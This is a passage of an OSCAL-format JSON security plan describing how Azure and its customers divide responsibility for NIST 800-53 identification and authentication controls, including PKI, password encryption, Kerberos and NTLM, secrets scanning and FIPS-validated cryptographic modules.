statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"74c83659-8b8e-4bd2-af58-534ff233f7aa","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-038"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"},{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-039"}],"statement-id":"ia-5.2_smt.b","by-components":[{"uuid":"e9d4b088-1b22-480e-81e2-980b1c9946f7","export":{"provided":[{"uuid":"09161c7e-d4d5-4efe-826f-8f73fc6eeef2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-038"}],"description":"Microsoft's corporate PKI has been established to provide a variety of digital certificate services to support operations for Azure and for the Microsoft corporation. The Microsoft corporate PKI functions as the Certificate Authority (CA) and Registration Authority (RA) and provides directory services to manage keys and certificates. The certificates are signed by an internal Microsoft CA and are validated against that CA's public key. Azure also checks certificates against certificate revocation lists. PKI certificates are stored within smart cards and authorized access to the corresponding private keys are enforced. Access to certs is restricted via PIN requirements to gain access to the certificate stored on the card. The Azure PKI intermediate CA servers are members of only internally rooted PKI chains, permitting the issuance of certificates to users and computers within the Azure AD environments. Azure validates the certificates by constructing a certification path with status information to an accepted trust anchor."},{"uuid":"a8ea35f3-860b-4d2e-b3bc-ddf8c03b9b49","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-039"}],"description":"Azure domain controllers cache revocation data and make it available to Azure assets if the primary revocation lists are unavailable."}],"responsibilities":[{"uuid":"58e7ecdf-5868-4b73-8446-3237cddec4da","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-038"}],"description":"The customer is responsible for employing PKI-based authentication within customer-deployed resources to validate certifications by constructing and verifying a certification path to an accepted trust anchor, including checking certificate status information. It is the responsibility of the user to protect their private key through limited instances of the private key and encryption of the private key. Azure provides the capability to customers to access their accounts programmatically through the SMAPI that relies on public/private key pairs. It is the customer's responsibility to properly set up and configure the key pairs. It is also the responsibility of the customer to manage private keys and revoke any certificates that have been compromised or expired. When using the SMAPI interface, authentication does not use the federated identity. Instead, the customer should generate a public/private key pair and self-signed certificate and registers that certificate using the portal. The certificate is then used as a client certificate in the RPC over HTTPS connection to SMAPI. Customer is responsible for protecting private keys generated.","provided-uuid":"09161c7e-d4d5-4efe-826f-8f73fc6eeef2"},{"uuid":"680b76e5-35a3-4ddf-b7ac-4acfa434458a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-039"}],"description":"The customer is responsible for employing PKI-based authentication within customer-deployed resources and implementing a local cache of private key data to support path discovery and validation when unable to access this information via the network.","provided-uuid":"a8ea35f3-860b-4d2e-b3bc-ddf8c03b9b49"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"b02c1a20-5a4a-4cc8-95ff-adbf6b460852","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ia-5.6","statements":[{"uuid":"39aea818-ae71-4226-99b9-8cad4ed107cc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-040"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-5.6_smt","by-components":[{"uuid":"3211b883-c4b4-4cbd-b97a-b26e6e4f0397","export":{"provided":[{"uuid":"dad806d6-a595-4fa2-b878-cca5c86ee833","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-040"}],"description":"All passwords used to access the Microsoft corporate network or business information must be considered and handled as \"information as per the InfoSec #2.0 Information Classification and Handling Standard.\" Core Services Engineering and Operations (CSEO) is responsible for protecting Microsoft corporate network authenticators._x000D_ _x000D_ Per corporate security policy, usernames and passwords are never stored or transmitted in the clear or any unencrypted format. Passwords must not be shared or revealed to anyone other than the authorized user. Additionally, passwords must be promptly changed if they are suspected of being known by unauthorized individuals._x000D_ _x000D_ Per Azure policy, cryptographic protection is applied to passwords when transmitted and stored, and are never transmitted in any unencrypted format natively within the Azure environment._x000D_ _x000D_ Cryptographic certificates are stored in an approved secret management store. Information stored in the approved secret management stores is encrypted, and access occurs over an encrypted channel._x000D_ _x000D_ Authentication credentials, such as username/password pairs, are considered High Business Impact (HBI) data and are required to be protected based upon its classification. Encryption must be used when storing or transmitting passwords, username/password files, or authentication tokens, in accordance with Azure asset protection standard. Azure uses the following authentication protocols with commensurate encryption._x000D_ _x000D_ Kerberos V5_x000D_ _x000D_ Kerberos is a network authentication protocol. It is designed to provide strong authentication for client/server applications by using secret-key cryptography. The Kerberos protocol uses strong cryptography so that a client can prove its identity to a server (and vice versa) across an insecure network connection._x000D_ _x000D_ The Kerberos V5 protocol can use both symmetric and asymmetric encryption. Because most Kerberos encryption methods are based on keys that can be created only by the KDC and the client, or by the KDC and a network service, the Kerberos V5 protocol is said to use symmetric encryption. That is, the same key is used to encrypt and decrypt messages._x000D_ _x000D_ Microsoft's implementation of the Kerberos protocol can also make limited use of asymmetric encryption. A private/public key pair can be used to encrypt or decrypt initial authentication messages from a network client or a network service as in the case of public key certificates on smart cards._x000D_ _x000D_ NTLMv2_x000D_ _x000D_ NTLM credentials are based on data obtained during the interactive logon process and consist of a domain name, a username, and a one-way hash of the user's password. NTLM uses an encrypted challenge/response protocol to authenticate a user without sending the user's password over the wire. Instead, the system requesting authentication must perform a calculation that proves it has access to the secured NTLM credentials._x000D_ _x000D_ Interactive NTLM authentication over a network typically involves two systems: a client system, where the user is requesting authentication, and a domain controller, where information related to the user's password is kept. Noninteractive authentication, which may be required to permit an already logged-on user to access a resource such as a server application, typically involves three systems: a client, a server, and a domain controller that does the authentication calculations on behalf of the server._x000D_ _x000D_ The following steps present an outline of NTLM noninteractive authentication. The first step provides the user's NTLM credentials and occurs only as part of the interactive authentication (logon) process._x000D_ _x000D_ 1. (Interactive authentication only) A user accesses a client computer and provides a domain name, username, and password. The client computes a cryptographic hash of the password and discards the actual password._x000D_ 2. The client sends the username to the server._x000D_ 3. The server generates a 16-byte random number, called a challenge or nonce, and sends it to the client._x000D_ 4. The client encrypts this challenge with the hash of the user's password and returns the result to the server. This is called the response._x000D_ 5. The server sends the following items to the domain controller - username; challenge sent to the client; response received from the client._x000D_ 6. The domain controller uses the username to retrieve the hash of the user's password from the Security Account Manager database. It uses this password hash to encrypt the challenge._x000D_ 7. The domain controller compares the encrypted challenge it computed (in step 6) to the response computed by the client (in step 4). If they are identical, authentication is successful._x000D_ _x000D_"}],"responsibilities":[{"uuid":"dd6f1945-b873-42b0-a24a-85a22c61306a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-040"}],"description":"The customer agency is responsible for ensuring their authorized users protect all provided authenticators, including passwords. Customer agency users should protect authenticators with the classification or sensitivity of the information accessed.","provided-uuid":"dad806d6-a595-4fa2-b878-cca5c86ee833"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"2f8130fd-4cb4-46e5-8182-de7eadeabb59","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ia-5.7","statements":[{"uuid":"7f8f0c3e-a7ba-4caa-84a5-04c12ffe338f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-041"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-5.7_smt","by-components":[{"uuid":"ee2f02ab-9de6-483a-81dd-6c15cf139bcd","export":{"provided":[{"uuid":"26c392ca-c49d-4af4-ab64-2053bf7cbf94","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-041"}],"description":"Azure explicitly prohibits the use of unencrypted static authenticators embedded in applications, access scripts, or function keys. Any script that uses an authenticator makes a call to a secrets management database prior to each use. Access to the secrets management database is audited, which allows detection of violations of this prohibition if a service account is used to access a system without a corresponding call to the secrets management database._x000D_ _x000D_ Azure service teams perform security testing for Azure services through the Security Development Lifecycle (SDL) process that is followed for all engineering and development projects. As part of the security testing that occurs during multiple phases of the SDL process, Azure teams ensure there are no unencrypted authenticators embedded in the applications, access scripts or function keys. CredScan is utilized on all official builds in all build pipelines, and either breaking the build process preventing production use or creating work items assigned to the Azure service team for remediation._x000D_ _x000D_"}],"responsibilities":[{"uuid":"c555cf55-cfa3-4d2d-9365-c4205c463269","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-041"}],"description":"The customer is responsible for ensuring there are no unencrypted static authenticators within customer-deployed resources.","provided-uuid":"26c392ca-c49d-4af4-ab64-2053bf7cbf94"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"43b1f707-3592-4543-b089-93d9fd2711a0","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ia-5.8","statements":[{"uuid":"a9b26b35-5794-47ab-8290-b437f2993b00","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-042"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-5.8_smt","by-components":[{"uuid":"0c6e4ea2-a06e-4140-866c-c4cfd50b0314","export":{"provided":[{"uuid":"bf9ab4ea-d138-4ab3-82d7-e7891219b528","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-042"}],"description":"Azure uses smart cards that differentiate between different AD domains. This ensures that personnel use different authenticators when accessing the two systems and prevents an attacker from gaining access to both systems if one set of authenticators is compromised. In addition, Azure uses single-sign-on, encryption of AAD passwords that exist in the back-end and passwords utilized where smartcards are not possible via storage in Azure Key Vault, and encryption of all traffic with HTTPS, mitigating the risk of compromise._x000D_ _x000D_"}],"responsibilities":[{"uuid":"5802c676-0130-48f2-9e50-beda85e7b871","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-042"}],"description":"The customer is responsible for managing the risk imposed by users with multiple accounts on customer-deployed resources (e.g., having different authenticators on all systems, employing some form of single sign-on mechanism, or including some form of one-time passwords on all systems).","provided-uuid":"bf9ab4ea-d138-4ab3-82d7-e7891219b528"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"f7525387-899b-44d0-8829-d813b8bb1931","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ia-5.13","statements":[{"uuid":"575be83c-992c-4134-9abb-dd1ff5891cae","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-043"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ia-5.13_smt","by-components":[{"uuid":"da849074-e6d3-413a-8458-bcc45fb6467e","export":{"provided":[{"uuid":"a09f2e71-45f1-4c1b-b3b4-a7265d52f6de","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-043"}],"description":"Azure does not allow the use of cached authenticators within the Azure environment. Once a session has closed or the user has logged off, the user must re-authenticate to the system._x000D_ _x000D_"}],"responsibilities":[{"uuid":"ebfef233-1c4f-4834-9def-75298a3d16d2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-043"}],"description":"The customer is responsible for enforcing the expiration of cached authenticators.","provided-uuid":"a09f2e71-45f1-4c1b-b3b4-a7265d52f6de"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"1657f7ac-6ce5-4b11-ba8d-d1cd4146816c","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ia-6","statements":[{"uuid":"052c70ad-c15e-4846-b424-fc452862e857","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-044"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-6_smt","by-components":[{"uuid":"e54497eb-cba8-4808-9a3d-4a11addf9240","export":{"provided":[{"uuid":"632ba0da-9446-4459-be1b-9d5dffd75995","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-044"}],"description":"Azure protects authenticator feedback using the built-in operating system security controls that protect passwords when authenticating to system components. Additionally, SSH and Remote Desktop Protocol (RDP) are used for authentication into the Azure production environment and provide obfuscation of credentials. No feedback is provided during the authentication process that could lead to potential exploitation by unauthorized users. Authenticators are displayed as asterisks so that the user is aware an authenticator is being entered, but the authenticator cannot be viewed._x000D_ _x000D_"}],"responsibilities":[{"uuid":"4be60446-6731-4a72-ab23-73920628822b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-044"}],"description":"The customer is responsible for obscuring authentication feedback information during the authentication process for any customer-deployed resources.","provided-uuid":"632ba0da-9446-4459-be1b-9d5dffd75995"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"bd4456cc-f3b5-4b0b-889a-669666c3f27e","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ia-7","statements":[{"uuid":"e9abdb37-9e3e-4507-b58a-f419e1fb8d35","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-045"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-7_smt","by-components":[{"uuid":"1fcfaf03-bdff-4738-a92e-9c1eb1defff7","export":{"provided":[{"uuid":"5796f0a5-0483-4208-a41e-7b563ec9d6ab","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-045"}],"description":"Azure implements encryption mechanisms on all internal and customer communications using cryptographic certificates issued by Certificate Management Tool which are anchored to the root Certificate Authority (CA). To request a cryptographic certificate, the Azure user interacts with an approved secret management store. The secret management store then interacts with Certificate Management Tool to process the request. The request is routed to the user's manager for approval. Once the certificate is issued, the user uses multifactor authentication to access Azure assets to install the certificate. This process meets the requirements of applicable federal laws, Executive Orders, directives, policies, regulations, standards, and guidance for authentication to a cryptographic module._x000D_ _x000D_ Encryption mechanisms and techniques used by Azure follow the requirements and restrictions outlined in the Microsoft Cryptographic Standards for SDL Covered Products. These standards are in line with the use of only FIPS 140-2 compliant cyphers. Service data and information are handled in accordance with the requirements and restrictions specified in the Asset Classification Standard and the Asset Protection Standard when cryptography is used. The Asset Classification Standards and Asset Protection Standard establish the mandatory minimum requirements for Microsoft's online services' asset ownership, classification, and protection. Azure utilizes encryption for user authentication through Active Directory. The following FIPS-approved algorithms are supported:_x000D_ _x000D_ * 3690 - Virtual TPM_x000D_ * 3651 - Secure Kernel Code Integrity_x000D_ * 3644 - Code Integrity_x000D_ * 3630 - Windows Embedded Compact Cryptographic Primitives Library (bcrypt.dll)_x000D_ * 3615 - Windows OS Loader_x000D_ * 3544 - Cryptographic Primitives Library_x000D_ * 3527 - Kernel Mode Cryptographic Primitives Library_x000D_ * 3513 - Secure Kernel Code Integrity (skci.dll) in Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB, Windows Server 2016 Standard, Windows Server 2016 Datacenter, Windows Storage Server 2016_x000D_ * 3510 - Code Integrity (ci.dll) in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB, Windows 10 Mobile, Windows Server 2016 Standard, Windows Server 2016 Datacenter, Windows Storage Server 2016_x000D_ * 3502 - BitLocker® Windows OS Loader (winload) in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB, Windows 10 Mobile, Windows Server 2016 Standard, Windows Server 2016 Datacenter, Windows Storage Server 2016_x000D_ * 3501 - BitLocker® Windows Resume (winresume) in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB, Windows Server 2016 Standard, Windows Server 2016 Datacenter, Windows Storage Server 2016_x000D_ * 3487 - Boot Manager in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB, Windows 10 Mobile, Windows Server 2016 Standard, Windows Server 2016 Datacenter, Windows Storage Server 2016_x000D_ * 3480 - Windows OS Loader_x000D_ * 3469 - Code Integrity (ci.dll) in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Mobile, Windows 10 for Surface Hub_x000D_ * 3464 - BitLocker® Windows Resume (winresume) in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise_x000D_ * 3451 - BitLocker® Windows OS Loader (winload) in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Mobile, Windows 10 for Surface Hub_x000D_ * 3447 - Boot Manager in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Mobile, Windows 10 for Surface Hub_x000D_ * 3197 - Cryptographic Primitives Library_x000D_ * 3196 - Kernel Mode Cryptographic Primitives Library_x000D_ * 3195 - Code Integrity_x000D_ * 3194 - Windows OS Loader_x000D_ * 3096 - Secure Kernel Code Integrity_x000D_ * 3095 - Cryptographic Primitives Library_x000D_ * 3094 - Kernel Mode Cryptographic Primitives Library_x000D_ * 3093 - Code Integrity_x000D_ * 3092 - BitLocker Dump Filter_x000D_ * 3091 - Windows Resume_x000D_ * 3090 - Windows OS Loader_x000D_ * 3089 - Boot Manager_x000D_ * 2938 - Secure Kernel Code Integrity (skci.dll) in Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB, Windows Server 2016 Standard, Windows Server 2016 Datacenter, Windows Storage Server 2016_x000D_ * 2937 - Cryptographic Primitives Library (bcryptprimitives.dll and ncryptsslp.dll) in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB, Windows 10 Mobile, Windows Server 2016 Standard, Windows Server 2016 Datacenter, Windows Storage Server 2016_x000D_ * 2936 - Kernel Mode Cryptographic Primitives Library (cng.sys) in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB, Windows 10 Mobile, Windows Server 2016 Standard, Windows Server 2016 Datacenter, Windows Storage Server 2016_x000D_ * 2935 - Code Integrity (ci.dll) in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB, Windows 10 Mobile, Windows Server 2016 Standard, Windows Server 2016 Datacenter, Windows Storage Server 2016_x000D_ * 2934 - BitLocker® Dump Filter (dumpfve.sys) in Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB, Windows 10 Mobile, Windows Server 2016 Standard, Windows Server 2016 Datacenter, Windows Storage Server 2016_x000D_ * 2933 - BitLocker® Windows Resume (winresume) in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB, Windows Server 2016 Standard, Windows Server 2016 Datacenter, Windows Storage Server 2016_x000D_ * 2932 - BitLocker® Windows OS Loader (winload) in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB, Windows 10 Mobile, Windows Server 2016 Standard, Windows Server 2016 Datacenter, Windows Storage Server 2016_x000D_ * 2931 - Boot Manager in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB, Windows 10 Mobile, Windows Server 2016 Standard, Windows Server 2016 Datacenter, Windows Storage Server 2016_x000D_ * 2703 - BitLocker® Dump Filter (dumpfve.sys) in Microsoft Windows 10 Pro, Windows 10 Enterprise, Windows 10 Mobile, Windows 10 for Surface Hub_x000D_ * 2702 - BitLocker® Windows Resume (winresume) in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise_x000D_ * 2701 - BitLocker® Windows OS Loader (winload) in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Mobile, Windows 10 for Surface Hub_x000D_ * 2700 - Boot Manager in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Mobile, Windows 10 for Surface Hub_x000D_ * 2607 - Secure Kernel Code Integrity (skci.dll) in Microsoft Windows 10 Enterprise, Windows 10 Enterprise LTSB_x000D_ * 2606 - Cryptographic Primitives Library (bcryptprimitives.dll and ncryptsslp.dll) in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB, Windows 10 Mobile, Windows 10 for Surface Hub_x000D_ * 2605 - Kernel Mode Cryptographic Primitives Library (cng.sys) in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB, Windows 10 Mobile, Windows 10 for Surface Hub_x000D_ * 2604 - Code Integrity (ci.dll) in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB, Windows 10 Mobile, Windows 10 for Surface Hub_x000D_ * 2603 - BitLocker® Dump Filter (dumpfve.sys) in Microsoft Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB_x000D_ * 2602 - BitLocker® Windows Resume (winresume) in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB_x000D_ * 2601 - BitLocker® Windows OS Loader (winload) in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB_x000D_ * 2600 - Boot Manager in Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB_x000D_ _x000D_ Network Devices_x000D_ _x000D_ AES-256 bit encrypted SSH is used for network device authentication using FIPS 140-2 approved algorithms:_x000D_ _x000D_ * SecureCRT® 5.1-6.1 (FIPS Validation Certificate 608)_x000D_ * SecureCRT 6.2-7.2 (FIPS Validation Certificate 1058)_x000D_ * SecureCRT 7.3 (FIPS Validation Certificate 0039)_x000D_ * SecureCRT 8.0 and later (FIPS Validation Certificate 0048)_x000D_ _x000D_"}],"responsibilities":[{"uuid":"4d512513-9625-44b4-8bff-0d61da8b7574","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-045"}],"description":"The customer is responsible for implementing mechanisms for authentication to a cryptographic module (e.g., configuring web applications). Customers are responsible for configuring their web browsers, mobile devices, etc., to enable communications through FIPS 140-2 compliant encryption. Customers who enforce FDCC/USGCB settings on their computers or enablers (for REST API) will achieve FIPS 140-2 encryption for data transmitted to Microsoft Azure between their enablers (for REST API) and the Azure Web services interface. Strong encryption with FIPS-approved ciphers is still possible if workstations are not operating in FIPS mode. Microsoft Azure SDK extends the core .NET libraries to allow developers to integrate the .NET Cryptographic Service Providers (CSPs) within Microsoft Azure. Developers familiar with .NET CSPs can easily implement encryption, hashing, and key management functionality for stored or transmitted data.","provided-uuid":"5796f0a5-0483-4208-a41e-7b563ec9d6ab"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"67943b7e-bbfc-4150-9445-9d6b644d99e2","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ia-8","statements":[{"uuid":"f1247437-ea07-4fd7-90cb-5e80575fbef0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-046"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ia-8_smt","by-components":[{"uuid":"c732beb0-e200-4495-8390-1ff29fcdc745","export":{"provided":[{"uuid":"c0425c7e-9fba-489b-9a63-9e2d88bdfcca","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-046"}],"description":"Azure does not allow any non-organizational users to authenticate to production systems._x000D_ _x000D_"}],"responsibilities":[{"uuid":"e0554abf-c1db-433e-814d-25eafa2e5561","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-046"}],"description":"The customer is responsible for identifying and authenticating non-organizational users accessing customer-deployed resources.","provided-uuid":"c0425c7e-9fba-489b-9a63-9e2d88bdfcca"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"719f81da-5ae2-40d8-959d-9b46dc07bee3","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ia-8.1","statements":[{"uuid":"07ee4729-af33-419e-aa1e-18bf2b6f06e4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-047"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ia-8.1_smt","by-components":[{"uuid":"bd2bd5eb-384a-428a-a0ed-276b608efebf","export":{"provided":[{"uuid":"6fc5765f-b1a2-4297-9948-f90e78d04db5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-047"}],"description":"Azure does not allow any non-organizational users to authenticate to production systems. Azure does not utilize Personal Identity Verification (PIV) credentials for internal personnel because PIV cards are not available to Azure._x000D_ _x000D_"}],"responsibilities":[{"uuid":"ca87c2b3-6a5d-481a-956c-dc997056e1f4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-047"}],"description":"The customer is responsible for accepting and verifying Personal Identity Verification (PIV) credentials issued by other federal agencies. Note: if the customer does not deploy PIV credentials this control is not applicable.","provided-uuid":"6fc5765f-b1a2-4297-9948-f90e78d04db5"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"e500c2b5-2c30-4a01-81bf-4d1b7aee8861","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ia-8.2","statements":[{"uuid":"8f0dd8c4-bf96-46e2-a78c-a9ebad5ab339","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-048"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ia-8.2_smt","by-components":[{"uuid":"ca5a989a-bf75-45fc-8b8f-78bb4a0300e4","export":{"provided":[{"uuid":"442279db-9c24-4c6a-ba06-cef82a6fbe8e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-048"}],"description":"Azure does not allow any non-organizational users to authenticate to production systems. Azure does not accept or process any third-party credentials._x000D_ 